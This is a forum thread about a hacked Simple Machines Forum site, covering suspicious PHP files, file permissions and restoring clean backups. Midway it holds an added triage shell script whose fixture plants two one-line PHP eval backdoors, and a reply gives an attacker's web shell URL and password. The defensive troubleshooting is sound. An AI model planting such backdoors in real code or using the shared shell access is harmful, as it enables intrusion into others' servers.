Site is being hacked as we speak

Started by Kimmie, November 17, 2013, 01:56:01 PM

Kimmie


Arantor

Did your host ever come up with any information?

* Arantor Beeblebrox the First wonders if there is something deeper going on... like permissions not properly configured on files.
Holder of controversial views, all of which my own.


Kimmie

No. And I even talked to them as late as yesterday morning. There is a huge vulnerability somewhere and we gotta find it. I can't keep going through this. I have even changed all my pw's twice since the last time I talked to you folks here

Arantor

Did you put up clean files like we suggested?

Any themes that shouldn't be there?
Holder of controversial views, all of which my own.


Kimmie

I used a backup from almost 1 month prior to it happening before. All themes are the ones I have had. I threw my site into maintenance mode but cPanel will not let me import the backup. File is too big. I was told to use bigdump but I have never used it before. On this part here.. do I leave this as localhost or do I change it to the server IP?


Kimmie

Sources Folder: Ajax.php
PublicHtml Folder: .config.php3


These files are showing as having been updated at 8pm tonight, which was right after I was on the site last and is probably when he did it. Can you look at it and see if you see anything suspicious?


Kimmie


Arantor

Yes, both of those are suspicious files.

That tells me file permissions weren't set up properly allowing for files to be written to your website from somewhere else (ask your host, they should have logs)

But as we warned you, there was no guarantee the backup would be clean. It's entirely possible that the backup was already previously compromised somehow (e.g. bad file permissions)
Holder of controversial views, all of which my own.
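A defender-side triage script, added here and not part of the thread, covering the two checks raised above: Kimmie's "what changed after I was last on the site" question and Arantor's suspicion about file permissions. The web root, file names, timestamps and file contents are constructed to mirror the thread (Sources/Ajax.php and a hidden .config.php3), so the script runs stand-alone.

```shell
#!/bin/sh
# Added triage helper, not from the thread. Builds a constructed SMF-like web
# root, then lists files changed after a reference time, world-writable files,
# and PHP-ish files (any extension) that contain eval()/base64_decode().
ROOT="${ROOT:-$(mktemp -d)}"

make_sample_tree() {
  # Constructed fixture mirroring the thread: a Sources/Ajax.php and a hidden
  # .config.php3 written "tonight", beside legitimate files dated 17 Nov 2013.
  mkdir -p "$ROOT/Sources" "$ROOT/Themes/default"
  printf '<?php // legitimate file\n' > "$ROOT/index.php"
  printf '<?php // legitimate file\n' > "$ROOT/Themes/default/index.template.php"
  touch -t 201311171200 "$ROOT/index.php" "$ROOT/Themes/default/index.template.php"
  # Reference marker: the last time the owner knows the site was clean.
  touch -t 201311171900 "$ROOT/.reference"
  printf '<?php eval(base64_decode($_POST["x"]));\n' > "$ROOT/Sources/Ajax.php"
  printf '<?php @eval($_REQUEST["c"]);\n' > "$ROOT/.config.php3"
  chmod 666 "$ROOT/.config.php3"   # the mis-set permission Arantor suspects
}

# Files modified after the reference marker (what Kimmie noticed at 8pm).
recently_modified() {
  find "$ROOT" -type f -newer "$ROOT/.reference" ! -name .reference | sort
}

# Files anyone on the server can write to (-002 = world write bit set).
world_writable() {
  find "$ROOT" -type f -perm -002 | sort
}

# PHP files, including odd extensions like .php3, containing eval()/base64_decode().
suspicious_php() {
  find "$ROOT" -type f \( -name '*.php' -o -name '*.php3' \) \
    -exec grep -lE 'eval\(|base64_decode\(' {} + | sort
}

make_sample_tree
echo "== modified after reference =="; recently_modified
echo "== world-writable =="; world_writable
echo "== eval/base64_decode in PHP =="; suspicious_php
```

On a real host, point ROOT at the web root and touch the .reference marker to the last known-clean time instead of building the fixture; the host's logs then show which process wrote the flagged files.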


Kimmie

Yes but according to my host the files in the backup they used had not been modified in any way so I chose to leave it like that. Only problem with file permissions as I stated before is I have no control over those. I tried changing them then but the changes would not take.

Kimmie

If you can list for me what they are supposed to be, I can not only see if they can give me access to change them (every other host I have used I had that permission, with them I don't), but I can also see which ones need to be changed.

Arantor

Why do you not have control! This sounds like a recipe for disaster, and almost certainly contributed to being hacked.
Holder of controversial views, all of which my own.


Kimmie

I had it originally when I first put my site on this host 2 years ago. They since changed that but I plan on making them give those permissions back to me once they finally contact me. They are 5-6 hours ahead of me time-wise so it will be a few hours before they even see my ticket.

I am currently trying to upload a backup via the cPanel/backups option so hopefully this will work for now.

Colin

"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Colin

Here is what he is seeing.

Now you have my attention. Anyone who wants to have a look at this little tool he is using

http://192.241.210.14/ajax.php

He likes to use the password: 484654
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Kimmie

Quote from: Colin on November 30, 2013, 02:16:29 AM
Does this email address ring a bell?

[email protected]


No I have never seen that one before


This has been sitting here for 2 hours now. Any idea how long this is supposed to take :/ (uploading backup using cPanel/backups/Restore)




Colin

How big is your backup?
---------------------------

LOL this guy removed the credit for the person who actually built this web shell script. Go figure a hacker that won't credit a fellow hacker.

It looks like it is Web Shell by oRb that he is using.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Kimmie


Colin

No that should take only a couple of minutes. Try restarting that and trying it again.
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

Kimmie

Ended up falling asleep since it was so late. Let it sit all night and it didn't work. Going to try it again here in just a few minutes. Before I do that, I think I am going to use the large upgrade so I can have all new files, but I want to make sure I do this right first. I am following this so I assume it is still accurate and up to date:

http://wiki.simplemachines.org/smf/Upgrading#Extract_the_SMF_archive_and_upload_the_files_to_your_website


1. I need to delete publichtml folder.  ----- is there any other files I need to delete? If I have the large upgrade extracted on my pc I can go by that right?

2. Once those are deleted, I highlight all upgrade files and upload. This will put them in their respective places

3. chmod files (if I can - still have not heard from host). Using this to go by:
http://wiki.simplemachines.org/smf/Chmod

4. Run upgrade tool (point my browser to it). Once complete tell it to remove those files



